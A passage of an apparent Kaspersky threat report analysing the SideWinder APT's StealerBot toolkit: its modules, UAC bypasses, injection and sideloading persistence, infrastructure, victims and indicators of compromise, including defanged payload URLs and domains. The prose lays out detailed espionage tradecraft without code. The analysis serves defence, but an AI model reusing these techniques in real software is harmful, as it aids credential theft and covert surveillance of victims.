related pipes. 3 Unload module by ID: the Orchestrator should unload a module
with the ID specified in the received request. 4 Remove startup: the
Orchestrator should remove a module from the local configuration. The module ID
is specified in the received request. 5 Remove current module from the
configuration: the Orchestrator should remove the current module ID from the
local configuration. 6 Terminate current thread: the Orchestrator stops timers,
pipes and removes the current module from the current list of modules. 7 Save
log message: the Orchestrator saves a log message using the current module ID. 8
Save log message: the Orchestrator saves a log message using the specified
module ID. 9 Get output folder configuration. 10 Get C2 Modules URL: the
Orchestrator shares the current C2 Modules URL with the module. 11 Get C2
Gateway URL: the Orchestrator shares the current C2 Gateway URL with the module.
12 Get RSA_Key public key.
MODULES
KEYLOGGER
This module uses the “SetWindowsHookEx” function specified in the “user32.dll”
library to install a hook procedure and monitor low-level keyboard and mouse
input events. The malware can log keystrokes, mouse events, Windows clipboard
contents, and the title of the currently active window.
SCREENSHOT GRABBER
This module periodically grabs screenshots of the primary screen.
FILE STEALER
The File Stealer module collects files from specific directories. It also scans
removable drives to steal files with specific extensions. By default, the list
of extensions is as follows:
.ppk,.doc,.docx,.xls,.xlsx,.ppt,.zip,.pdf
1
.ppk,.doc,.docx,.xls,.xlsx,.ppt,.zip,.pdf
Based on these values, we can conclude that this tool was developed to perform
espionage activities by collecting files that usually contain sensitive
information, such as Microsoft Office documents. It also searches for PPK files,
which is the extension of files created by PuTTY to store private keys. PuTTY is
an SSH and Telnet client commonly used on Windows OS to access remote systems.
The stolen data also includes information about the local drive and file
attributes.
Snippet of code with the list of information collected by the File Stealer
module
LIVE CONSOLE
This library is configured to execute arbitrary commands on the compromised
system. It can be used as a passive backdoor, listening to the loopback
interface, or as a reverse shell, connecting to the C2 to receive commands. The
library can also process custom commands that provide the following
capabilities:
* Kill the module itself or its child processes;
* Download additional files to compromised systems;
* Add Windows Defender exclusions;
* Infect other users on the local system (requires high privileges);
* Download and execute remote HTML applications;
* Load arbitrary modules and extend malware capabilities.
Unlike the other modules, Live Console communicates directly with a C2 whose
address is embedded in the module’s code. By default, the malware starts a new
“cmd.exe” process, forwards data received from the attacker to its standard
input, and forwards the process output or error pipeline to the attacker.
If the infected OS is recent, i.e., Windows 10 build version greater than or
equal to “17763”, the malware creates a pseudoconsole to launch “cmd.exe”.
Otherwise, it launches the same application using the “Process” class specified
in “System.Diagnostics”.
Before forwarding the command to the console, the malware checks if the first
byte of the received data has a specific value that indicates the presence of a
custom command. Below is a list of these values (command IDs) with descriptions
of the commands they identify.
Windows build Command ID Description < 17763 3 Kill all child processes <
17763 4 Kill the current module. Sends the message ID “2” to the Orchestrator to
unload the module itself. < 17763 16 Upload file to the infected system >=
17763 1 Infect current logged-in user >= 17763 2 Get current logged-in user >=
17763 3 Download and execute a remote HTML application >= 17763 4 Add
directories to AV exclusions >= 17763 5 Load a plugin
Most of the commands are self-explanatory. We’d like to add a few words on the
command with ID “1”, which is used to infect other users on the same system
whose profile is still “clean”. The malware infects the user by creating a copy
of the samples in the target user’s directory and creates a new registry value
to ensure persistence.
This command is interesting because in the case of a specific error, the bot
replies with the following message:
Infected User is already logged in, use install dynx command from stealer bot
for installation
1
2
Infected User is already logged in, use install dynx command from stealer bot
for installation
Currently, we don’t know what the dynx command represents, but the name “stealer
bot” in this message and the name of the resource embedded in the
“ModuleInstaller”, “StealerBot_CppInstaller”, led us to conclude that the
attacker named this malware StealerBot.
RDP CREDENTIAL STEALER
This module consists of different components: a .NET library, shellcode, and a
C++ library. It monitors running processes and injects malicious code into
“mstsc.exe” to steal RDP credentials.
mstsc.exe GUI
Mstsc.exe is the “Microsoft Terminal Service Client” process, which is the
default RDP client on Windows. The malware monitors the creation or termination
of processes with the name “mstsc.exe”. When a new creation event is detected
the malware creates a new pipe with the static name
“c63hh148d7c9437caa0f5850256ad32c” and injects malicious code into the new
process memory.
The injected code consists of different payloads that are embedded in the module
as resources. The payloads are selected at runtime according to the system
architecture, and merged before injection. The injected code is a shellcode that
loads another malicious library called “mscorlib”, written in C++ to steal RDP
credentials by hooking specific functions of the Windows library “SspiCli.dll”.
The library code appears to be based on open-source projects available on
GitHub. It uses the Microsoft Detours Package to add or remove the hooks to the
following functions:
* SspiPrepareForCredRead;
* CryptProtectMemory;
* CredIsMarshaledCredentialW.
The three functions are hooked to obtain the server name, password, and
username, respectively. The stolen data are sent to the main module using the
previously created pipe named “c63hh148d7c9437caa0f5850256ad32c”.
TOKEN GRABBER
The module is a .NET library designed to steal Google Chrome browser cookies and
authentication tokens related to Facebook, LinkedIn and Google services (Gmail,
Google Drive, etc.). It has many code dependencies and starts by loading
additional legitimate and signed libraries whose functions it uses. These
libraries are not present on the compromised system by default, so the malware
has to drop and load them to function properly.
Library Hash Description Newtonsoft.Json 52a7a3100310400e4655fb6cf204f024 A
popular high-performance JSON framework for .NET System.Data.SQLite
fcb2bc2caf7456cd9c2ffab633c1aa0b An ADO.NET provider for SQLite
SQLite_Interop_x64.dll 1b0114d4720af20f225e2fbd653cd296 A library for 64-bit
architectures required by System.Data.SQLite to work properly
SQLite_Interop_x86.dll f72f57aa894f7efbef7574a9e853406d A library for 32-bit
architectures required by System.Data.SQLite to work properly
CREDENTIAL PHISHER
This module attempts to harvest the user’s Windows credentials by displaying a
phishing prompt designed to deceive the victim.
Phishing prompt
Similar to the RDP Credential Stealer, the malware creates a new pipe
(“a21hg56ue2c2365cba1g9840256ad31c”) and injects malicious shellcode into a
targeted process, in this case “explorer.exe”. The shellcode loads a malicious
library called “credsphisher.dll”, which uses the Windows function
“CredUIPromptForWindowsCredentialsW” to display a phishing prompt to current
users and trick victims into entering their Windows credentials.
When the user enters the credentials, the malware uses the “LogonUserW” function
to check that the username and password provided are correct. If the user enters
incorrect credentials, the malware continues to display the prompt until it
receives a valid password. Finally, upon successful credential validation, the
malware writes the computer hostname, username and password to a previously
created pipe named “a21hg56ue2c2365cba1g9840256ad31c”.
UACBYPASS
This module is a .NET library designed to bypass UAC and run malicious code with
high privileges.
The library can achieve its goal using different bypass techniques, selected
according to the Windows version and the security solution installed on the
infected machine. The malware embeds various resources containing different
payloads used during malware execution.
Library Hash Description COMUacBypass 7f357621ba88a2a52b8146492364b6e0 Library
used to bypass UAC abusing IElevatedFactoryServer COM object manifest
d3136d7151f60ec41a370f4743c2983b XML manifest Module
b0f0c29f4143605d5f958eba664cc295 Malicious library used to download additional
malware ReflectiveDllLoader f492b2d5431985078b85c78661e20c09 Shellcode to run
libraries in memory VmComputeAgent ba2914b59c7ae08c346fc5a984dcc219 Program used
for Slui UAC bypass technique VmComputeAgent_exe
d3136d7151f60ec41a370f4743c2983b XML manifest
Before starting its execution, the malware checks certain conditions on the
system, namely that UAC elevation doesn’t require admin credentials and that the
infected user belongs to the ‘Administrator’ group. If both conditions are met,
the malware checks the Windows version and drops some artifacts according to the
obtained values.
Windows Server or Windows NT 6 %Temp%\%TempFile% Copy of resource named “Module”
%localappdata%\Microsoft\rundll32.exe Copy of the legitimate program
“%systemroot%\System32\rundll32.exe”
%localappdata%\Microsoft\rundll32.exe.config Copy of resource named “manifest”
Other Windows versions %localappdata%\Microsoft\devobj.dll Copy of resource
named “Module” %localappdata%\Microsoft\rdpclip.exe Copy of the legitimate
program “%systemroot%\System32\rdpclip.exe”
The main goal of this component is to execute the resource named “Module”, which
is a downloader, with high privileges. The malware tries to use different UAC
bypass techniques, which are selected according to the installed security
solution. By default, it tries to abuse the CMSTP (Windows Connection Manager
Profile Installer) program. This legitimate program is abused with a technique
discovered in 2017, where the attacker can pass a custom profile to execute
arbitrary commands with high privilege. The default bypass technique is used on
all systems except those protected by Kaspersky or 360 Total Security.
If these security solutions are detected, the malware attempts to use a more
recent UAC bypass technique discovered in 2022, which abuses the
“IElevatedFactoryServer” COM object.
In this case, the malware injects malicious shellcode into “explorer.exe”. The
shellcode loads and executes a malicious library that was stored in the resource
named “COMUacBypass”. The library uses the “IElevatedFactoryServer” COM object
to register a new Windows task with the highest privileges, allowing the
attacker to execute the command to run the dropped payload with elevated
privileges.
During the static analysis of the “UACBypass” module we noticed the presence of
code that is not called or executed. Specifically, we noticed a method named
“KasperskyUACBypass” that implements another bypass technique that was probably
used in the past when the system was protected by Kaspersky anti-malware
software. The method implements a bypass technique that abuses the legitimate
Windows program slui.exe. It is used to activate and register the operating
system with a valid product key, but is prone to a file handler hijacking
weakness. The hijacking technique was described in 2020 and is based on the
modification of specific Windows registry keys. Based on the created values, we
believe the attacker based their code on a proof of concept available on GitHub.
The module still includes two resources that are used exclusively by this code:
VmComputeAgent VmComputeAgent_exe
1
2
VmComputeAgent
VmComputeAgent_exe
The first is a very simple program, packed with ConfuserEx, which starts a new
process: “%systemroot%\System32\slui.exe” as administrator.
The second is an XML manifest.
DOWNLOADER
The library is a downloader developed in C++ that attempts to retrieve three
payloads using different URLs.
hxxps://nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/bf7dy/111e9a21?name=inpl64
hxxps://nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/0ywcg/4dfc92c?name=stg64
hxxps://nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/3ysvj/955da0ae?name=rflr
1
2
3
hxxps://nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/bf7dy/111e9a21?name=inpl64
hxxps://nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/0ywcg/4dfc92c?name=stg64
hxxps://nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/3ysvj/955da0ae?name=rflr
Unfortunately, we were not able to get a valid response from the server, but
considering the “name” variable inside the URL and the logic of the various
components observed during the investigation, we can infer that each “name”
value probably also indicates the real purpose of the file.
Variable Description ?name=inpl64 implant for 64-bit architectures ?name=stg64
stager for 64-bit architectures ?name=rlfr reflective loader ???
The downloaded data are combined into a final payload with the following
structure:
stg64 + <size of rlfr+inpl64+8> + rlfr + <delimiter> + inpl64
1
stg64 + <size of rlfr+inpl64+8> + rlfr + <delimiter> + inpl64
Finally, the malware loads the payload into memory and executes it. The
execution method is selected according to the version of Windows.
On systems prior to Windows 10, the malware allocates a memory region with read,
write and execution permissions, copies the previously generated payload to the
new region, and directly calls the first address.
On newer systems, the malware allocates a larger memory space and prepends a
small shellcode located in the “.data” section to the final payload.
The malware then patches the kernel32 image in memory and hooks the
“LoadLibraryA” function to redirect the execution flow to the small shellcode
copied in the allocated region.
Finally, it calls the “LoadLibraryA” function, passing the argument “aepic.dll”.
Snippet of reversed code used to hook LoadLibrary and run the payload
The small shellcode compares the first 8 bytes of the received argument with the
static string “aepic.dl”, and if the bytes match, it jumps to the downloaded
shellcode “stg64”; otherwise, it jumps to the real “LoadLibraryA” function.
Shellcode embedded in the downloader image
INSTALLERS
During the investigation we found two more components, which are installers used
to deploy the StealerBot on the systems. We didn’t observe them during the
infection chain. They are probably used to install new versions of the malware
or deploy the malware in different contexts on the same machine. For example, to
infect another user.
INSTALLERPAYLOAD
The first component is a library developed in C++ that acts as a loader. The
code is very similar to the “Downloader” component observed in the UAC bypass
module. The library contains different payloads that are joined together at
runtime and injected into the remote “spoolsv.exe” process.
The injected payload reflectively loads a library called “InstallerPayload.dll”,
written in C++, to download additional components and maintain their persistence
by creating a new Windows service.
The malware is configured to download the files from a predefined URL using
WinHTTP.
hxxps://pafgovt[.]com/mod/rnd/214/15109/14786/X6HPUSbM5luLGTzAhI12Ly8CfydiP869E
F0mo673/1/1706084656128/x3l8o/2c821e
1
2
hxxps://pafgovt[.]com/mod/rnd/214/15109/14786/X6HPUSbM5luLGTzAhI12Ly8CfydiP869E
F0mo673/1/1706084656128/x3l8o/2c821e
The specific file to be downloaded is requested with a variable “name”, which is
included in all GET requests. Each file is downloaded to a specific location:
Variable Destination file path ?name=bp %systemroot%\srclinks\%RANDOM_NAME%
Example name: VacPWtys ?name=ps %systemroot%\srclinks\write.exe
or
%systemroot%\srclinks\fsquirt.exe ?name=dj %systemroot%\srclinks\devobj.dll
or
%systemroot%\srclinks\propsys.dll ?name=v3d
%systemroot%\srclinks\vm3dservice.exe ?name=svh %systemroot%\srclinks\winmm.dll
?name=fsq %systemroot%\srclinks\write.exe
or
%systemroot%\srclinks\fsquirt.exe
The specific filename changes according to the Windows version.
If the Windows build is lower than 10240 (Windows 10 build 10240), the malware
installs the following files:
* %systemroot%\srclinks\write.exe
* %systemroot%\srclinks\propsys.dll
* %systemroot%\srclinks\write.exe.config
* %systemroot%\srclinks\vm3dservice.exe
* %systemroot%\srclinks\winmm.dll
Otherwise:
* %systemroot%\srclinks\fsquirt.exe
* %systemroot%\srclinks\devobj.dll
* %systemroot%\srclinks\fsquirt.exe.config
* %systemroot%\srclinks\vm3dservice.exe
* %systemroot%\srclinks\winmm.dll
The malware also creates a new Windows service named "srclink" to ensure that
the downloaded files can start automatically when the system restarts.
The service is configured to start automatically and run the following program:
C:\WINDOWS\srclinks\vm3dservice.exe
1
C:\WINDOWS\srclinks\vm3dservice.exe
The file is a legitimate program digitally signed by VMware and is used by the
attacker to sideload the malicious "winmm.dll" library.
This is a library developed in C++ and named "SyncBotServiceHijack.dll" that
exports all the functions normally exported by the legitimate “winmm.dll”
library located in the system32 directory.
All the functions point to a function that sleeps for 10 seconds and then raises
a signal error and terminates execution.
Instructions used to raise an error
This is part of the persistence mechanism created by the attacker. The malicious
Windows service created by the InstallerPayload component is configured to
launch another program if the service fails.
Windows service properties
We may presume that the attacker uses this trick to bypass detection and sandbox
technologies.
In this case, the service starts another program previously dropped by the
malware:
%systemroot%\srclinks\fsquirt.exe
1
%systemroot%\srclinks\fsquirt.exe
This is a legitimate Windows utility that provides the default GUI used by the
Bluetooth File Transfer Wizard. This utility is used by the attacker to sideload
another malicious library, "devobj.dll", which is a variant of the Backdoor
loader module.
INSTALLERPAYLOAD_NET
This is another .NET library, which performs similar actions to the previously
described InstallerPayload developed in C++. The main difference is that this
malware embeds most of the files as resources.
Library Hash Description devobjLoadAppDllx32 a7aad43a572f44f8c008b9885cf936cf
“Backdoor loader module” dropped as devobj.dll fsquirt
ba54013cad72cd79d2b7843602835ed3 Legitimate program signed by Microsoft Manage
f840c721e533c05d152d2bc7bf1bc165 Program to hijack Windows service manifest
d3136d7151f60ec41a370f4743c2983b XML manifest propsysLoadAppDllx32
56e7d6b5c61306096a5ba22ebbfb454e “Backdoor loader module” dropped as propsys.dll
Similar to InstallerPayload, the malware creates a new service that launches
Manage.exe. Manage.exe is a simple program that sleeps for 20 seconds and then
generates an exception.
The service is configured to launch another program in case of failure. The
second program, "fsquirt.exe" or "write.exe", is a legitimate application that
is used to sideload a malicious library, the Backdoor loader module component.
The encrypted file to be loaded by the Backdoor loader module component is
downloaded from a remote server using a URL embedded in the code:
hxxps://split.tyoin[.]biz/7n6at/g3mnr/1691394613799/f0f9e572
1
hxxps://split.tyoin[.]biz/7n6at/g3mnr/1691394613799/f0f9e572
The received data are stored in a file with a random name and no extension.
INFRASTRUCTURE
The attacker registered numerous domains using Hostinger, Namecheap, and Hosting
Concepts as providers. They typically configure the malware to communicate with
FQDN using specific subdomains with names that appear legitimate and are
probably selected for relevance to the target. For example, the following is a
small subset of subdomains used by the attacker.
* nextgen[.]paknavy-govpk[.]net
* premier[.]moittpk[.]org
* cabinet-division-pk[.]fia-gov[.]com
* navy-lk[.]direct888[.]net
* srilanka-navy[.]lforvk[.]com
* portdjibouti[.]pmd-office[.]org
* portdedjibouti[.]shipping-policy[.]info
* mofa-gov-sa[.]direct888[.]net
* mod-gov-bd[.]direct888[.]net
* mmcert-org-mm[.]donwloaded[.]com
* opmcm-gov-np[.]fia-gov[.]net
Each domain and its related subdomains are resolved with a dedicated IP address.
The C2s are hosted on a VPS used exclusively by the attacker, but rented from
different providers for a very short time. The attacker uses different service
providers, but has a preference for HZ Hosting, BlueVPS, and GhostNET.
VICTIMS
SideWinder targeted entities in various countries: Bangladesh, Djibouti, Jordan,
Malaysia, the Maldives, Myanmar, Nepal, Pakistan, Saudi Arabia, Sri Lanka,
Turkey and the United Arab Emirates.
Targeted sectors include government and military entities, logistics,
infrastructure and telecommunications companies, financial institutions,
universities and oil trading companies. The attacker also targeted diplomatic
entities in the following countries: Afghanistan, France, China, India,
Indonesia and Morocco.
ATTRIBUTION
We attribute these activities to the SideWinder APT group with medium/high
confidence. The infection chain observed in these attacks is consistent with
those observed in the past. Specifically, the following techniques are similar
to previous SideWinder activity:
* The use of remote template injection, which is abused to download RTF files
named “file.rtf” and forged to exploit CVE-2017-11882.
* The naming scheme used for the malicious subdomains, which attempts to
resemble legitimate domains that are of significance to the targets.
* The .NET Downloader component and the Backdoor loader module are similar to
those described in the past.
* Last but not least, most of the entities targeted by the group are similar to
those targeted by SideWinder in the past.
***More information, IoCs and YARA rules for SideWinder are available to
customers of the Kaspersky Intelligence Reporting Service. Contact:
intelreports@kaspersky.com.
IOCS
MALICIOUS DOCUMENTS
6cf6d55a3968e2176db2bba2134bbe94
c87eb71ff038df7b517644fa5c097eac
8202209354ece5c53648c52bdbd064f0
5cc784afb69c153ab325266e8a7afaf4
3a6916192106ae3ac7e55bd357bc5eee
54aadadcf77dec53b2566fe61b034384
8f83d19c2efc062e8983bce83062c9b6
8e8b61e5fb6f6792f2bee0ec947f1989
86eeb037f5669bff655de1e08199a554
1c36177ac4423129e301c5a40247f180
873079cd3e635adb609c38af71bad702
423e150d91edc568546f0d2f064a8bf1
4a5e818178f9b2dc48839a5dbe0e3cc1
RTF
26aa30505d8358ebeb5ee15aecb1cbb0
3233db78e37302b47436b550a21cdaf9
8d7c43913eba26f96cd656966c1e26d5
d0d1fba6bb7be933889ace0d6955a1d7
e706fc65f433e54538a3dbb1c359d75f
LNK
412b6ac53aeadb08449e41dccffb1abe දින සංශෝධන කර ගැනිම .lnk
2f4ba98dcd45e59fca488f436ab13501 Special Envoy Speech at NCA.jpg .lnk
BACKDOOR LOADER
propsys.dll
b69867ee5b9581687cef96e873b775ff
c3ce4094b3411060928143f63701aa2e
e1bdfa55227d37a71cdc248dc9512296
ea4b3f023bac3ad1a982cace9a6eafc3
44dbdd87b60c20b22d2a7926ad2d7bea
7e97cbf25eef7fc79828c033049822af
vsstrace.dll
101a63ecdd8c68434c665bf2b1d3ffc7
d885df399fc9f6c80e2df0c290414c2f
92dd91a5e3dfb6260e13c8033b729e03
515d2d6f91ba4b76847301855dfc0e83
3ede84d84c02aa7483eb734776a20dea
2011658436a7b04935c06f59a5db7161
STEALERBOT
3a036a1846bfeceb615101b10c7c910e Orchestrator
47f51c7f31ab4a0d91a0f4c07b2f99d7 Keylogger
f3058ac120a2ae7807f36899e27784ea Screenshot grabber
0fbb71525d65f0196a9bfbffea285b18 File stealer
1ed7ad166567c46f71dc703e55d31c7a Live Console
2f0e150e3d6dbb1624c727d1a641e754 RDP Credential Stealer
bf16760ee49742225fdb2a73c1bd83c7 RDP Credential Stealer – Injected
library
mscorlib.dll
b3650a88a50108873fc45ad3c249671a Token Grabber
4c40fcb2a12f171533fc070464db96d1 Credential Phisher – Injected library
eef9c0a9e364b4516a83a92592ffc831 UACBypass
SYNCBOTSERVICEHIJACK.DLL
1be93704870afd0b22a4475014f199c3
SERVICE HIJACK
f840c721e533c05d152d2bc7bf1bc165 Manage.exe
BACKDOOR LOADER DEVOBJ.DLL
5718c0d69939284ce4f6e0ce580958df
DOMAINS AND IPS
126-com[.]live
163inc[.]com
afmat[.]tech
alit[.]live
aliyum[.]tech
aliyumm[.]tech
asyn[.]info
ausibedu[.]org
bol-south[.]org
cnsa-gov[.]org
colot[.]info
comptes[.]tech
condet[.]org
conft[.]live
dafpak[.]org
decoty[.]tech
defenec[.]net
defpak[.]org
detru[.]info
dgps-govpk[.]co
dgps-govpk[.]com
dinfed[.]co
dirctt88[.]co
dirctt88[.]net
direct888[.]net
direct88[.]co
directt888[.]com
donwload-file[.]com
donwloaded[.]com
donwloaded[.]net
dowmload[.]net
downld[.]net
download-file[.]net
downloadabledocx[.]com
dynat[.]tech
dytt88[.]org
e1ix[.]mov
e1x[.]tech
fia-gov[.]com
fia-gov[.]net
gov-govpk[.]info
govpk[.]info
govpk[.]net
grouit[.]tech
gtrec[.]info
healththebest[.]com
jmicc[.]xyz
kernet[.]info
kretic[.]info
lforvk[.]com
mfa-gov[.]info
mfa-gov[.]net
mfa-govt[.]net
mfacom[.]org
mfagov[.]org
mfas[.]pro
mitlec[.]site
mod-gov-pk[.]live
mofa[.]email
mofagovs[.]org
moittpk[.]net
moittpk[.]org
mshealthcheck[.]live
nactagovpk[.]org
navy-mil[.]co
newmofa[.]com
newoutlook[.]live
nopler[.]live
ntcpak[.]live
ntcpak[.]org
ntcpk[.]info
ntcpk[.]net
numpy[.]info
numzy[.]net
nventic[.]info
office-drive[.]live
pafgovt[.]com
paknavy-gov[.]org
paknavy-govpk[.]info
paknavy-govpk[.]net
pdfrdr-update[.]com
pdfrdr-update[.]info
pmd-office[.]com
pmd-office[.]live
pmd-office[.]org
ptcl-net[.]com
scrabt[.]tech
shipping-policy[.]info
sjfu-edu[.]co
support-update[.]info
tazze[.]co
tex-ideas[.]info
tni-mil[.]com
tsinghua-edu[.]tech
tumet[.]info
u1x[.]co
ujsen[.]net
update-govpk[.]co
updtesession[.]online
widge[.]info
* APT
* Backdoor
* Malware
* Malware Descriptions
* Malware Technologies
* SideWinder
* Targeted attacks
* Trojan
Authors
* Giampaolo Dedola
* Vasily Berdnikov
Beyond the Surface: the evolution and expansion of the SideWinder APT group
Your email address will not be published. Required fields are marked *
Name *
Email *
Cancel
Δ
Table of Contents
* Infection vectors
* RTF exploit
* Initial infection LNK
* Downloader module
* ModuleInstaller
* Backdoor loader module
* StealerBot
* StealerBot Orchestrator
* Modules
* Keylogger
* Screenshot Grabber
* File Stealer
* Live Console
* RDP Credential Stealer
* Token Grabber
* Credential Phisher
* UACBypass
* Downloader
* Installers
* InstallerPayload
* InstallerPayload_NET
* Infrastructure
* Victims
* Attribution
* IOCs
* Malicious documents
* Rtf
* Lnk
* Backdoor Loader
* StealerBot
* SyncBotServiceHijack.dll
* Service Hijack
* Backdoor Loader devobj.dll
* Domains and IPs
GReAT webinars
13 May 2021, 1:00pm
GREAT IDEAS. BALALAIKA EDITION
* Boris Larin
* Denis Legezo
26 Feb 2021, 12:00pm
GREAT IDEAS. GREEN TEA EDITION
* John Hultquist
* Brian Bartholomew
* Suguru Ishimaru
* Vitaly Kamluk
* Seongsu Park
* Yusuke Niwa
* Motohiko Sato
17 Jun 2020, 1:00pm
GREAT IDEAS. POWERED BY SAS: MALWARE ATTRIBUTION AND NEXT-GEN IOT HONEYPOTS
* Marco Preuss
* Denis Legezo
* Costin Raiu
* Kurt Baumgartner
* Dan Demeter
* Yaroslav Shmelev
26 Aug 2020, 2:00pm
GREAT IDEAS. POWERED BY SAS: THREAT ACTORS ADVANCE ON NEW FRONTS
* Ivan Kwiatkowski
* Maher Yamout
* Noushin Shabab
* Pierre Delcher
* Félix Aime
* Giampaolo Dedola
* Santiago Pontiroli
22 Jul 2020, 2:00pm
GREAT IDEAS. POWERED BY SAS: THREAT HUNTING AND NEW TECHNIQUES
* Dmitry Bestuzhev
* Costin Raiu
* Pierre Delcher
* Brian Bartholomew
* Boris Larin
* Ariel Jungheit
* Fabio Assolini
From the same authors
TODDYCAT: KEEP CALM AND CHECK LOGS
MEET THE GOLDENJACKAL APT GROUP. DON’T EXPECT ANY HOWLS
APT TODDYCAT
TRANSPARENT TRIBE: EVOLUTION ANALYSIS, PART 2
TRANSPARENT TRIBE: EVOLUTION ANALYSIS, PART 1
SUBSCRIBE TO OUR WEEKLY E-MAILS
The hottest research right in your inbox
Email(Required)
(Required)
I agree to provide my email address to “AO Kaspersky Lab” to receive information
about new posts on the site. I understand that I can withdraw this consent at
any time via e-mail by clicking the “unsubscribe” link that I find at the bottom
of any e-mail sent to me for the purposes mentioned above.
Subscribe
Δ
In the same category
BLINDEAGLE FLYING HIGH IN LATIN AMERICA
EASTWIND CAMPAIGN: NEW CLOUDSORCERER ATTACKS ON GOVERNMENT ORGANIZATIONS IN
RUSSIA
APT TRENDS REPORT Q2 2024
CLOUDSORCERER – A NEW APT TARGETING RUSSIAN GOVERNMENT ENTITIES
APT TRENDS REPORT Q1 2024
LATEST POSTS
SOC, TI and IR posts
WHISPERS FROM THE DARK WEB CAVE. CYBERTHREATS IN THE MIDDLE EAST
* Vera Kholopova
* Kaspersky Security Services
Crimeware reports
AWAKEN LIKHO IS AWAKE: NEW TECHNIQUES OF AN APT GROUP
* Kaspersky
Malware descriptions
SCAM INFORMATION AND EVENT MANAGEMENT
* Alexander Kryazhev
* Denis Sitchikhin
Publications
FINDING A NEEDLE IN A HAYSTACK: MACHINE LEARNING AT THE FOREFRONT OF THREAT
HUNTING RESEARCH
* Mohamad Amin Hasbini
LATEST WEBINARS
Threat intelligence and IR
04 Sep 2024, 5:00pm 60 min
INSIDE THE DARK WEB: EXPLORING THE HUMAN SIDE OF CYBERCRIMINALS
* Anna Pavlovskaya
Technologies and services
13 Aug 2024, 5:00pm 60 min
THE CYBERSECURITY BUYER’S DILEMMA: HYPE VS (TRUE) EXPERTISE
* Oleg Gorobets
* Alexander Liskin
Cyberthreat talks
16 Jul 2024, 5:00pm 60 min
CYBERSECURITY’S HUMAN FACTOR – MORE THAN AN UNPATCHED VULNERABILITY
* Oleg Gorobets
Trainings and workshops
09 Jul 2024, 4:00pm 60 min
BUILDING AND PRIORITIZING DETECTION ENGINEERING BACKLOGS WITH MITRE ATT&CK
* Andrey Tamoykin
REPORTS
BEYOND THE SURFACE: THE EVOLUTION AND EXPANSION OF THE SIDEWINDER APT GROUP
Kaspersky analyzes SideWinder APT’s recent activity: new targets in the
MiddleEast and Africa, post-exploitation tools and techniques.
BLINDEAGLE FLYING HIGH IN LATIN AMERICA
Kaspersky shares insights into the activity and TTPs of the BlindEagle APT,
which targets organizations and individuals in Colombia, Ecuador, Chile, Panama
and other Latin American countries.
EASTWIND CAMPAIGN: NEW CLOUDSORCERER ATTACKS ON GOVERNMENT ORGANIZATIONS IN
RUSSIA
Kaspersky has identified a new EastWind campaign targeting Russian organizations
and using CloudSorcerer as well as APT31 and APT27 tools.
APT TRENDS REPORT Q2 2024
The report features the most significant developments relating to APT groups in
Q2 2024, including the new backdoor in Linux utility XZ, a new RAT called
SalmonQT, and hacktivist activity.
SUBSCRIBE TO OUR WEEKLY E-MAILS
The hottest research right in your inbox
Email(Required)
(Required)
I agree to provide my email address to “AO Kaspersky Lab” to receive information
about new posts on the site. I understand that I can withdraw this consent at
any time via e-mail by clicking the “unsubscribe” link that I find at the bottom
of any e-mail sent to me for the purposes mentioned above.
Subscribe
Δ
Threats
Threats
* APT (Targeted attacks)
* Secure environment (IoT)
* Mobile threats
* Financial threats
* Spam and phishing
* Industrial threats
* Web threats
* Vulnerabilities and exploits
* All threats
Categories
Categories
* APT reports
* Malware descriptions
* Security Bulletin
* Malware reports
* Spam and phishing reports
* Security technologies
* Research
* Publications
* All categories
Other sections
* Archive
* All tags
* Webinars
* APT Logbook
* Statistics
* Encyclopedia
* Threats descriptions
* KSB 2023
© 2024 AO Kaspersky Lab. All Rights Reserved.
Registered trademarks and service marks are the property of their respective
owners.
* Privacy Policy
* License Agreement
* Cookies
SUBSCRIBE TO OUR WEEKLY E-MAILS
The hottest research right in your inbox
Email(Required)
(Required)
I agree to provide my email address to “AO Kaspersky Lab” to receive information
about new posts on the site. I understand that I can withdraw this consent at
any time via e-mail by clicking the “unsubscribe” link that I find at the bottom
of any e-mail sent to me for the purposes mentioned above.
Subscribe
Δ
Notifications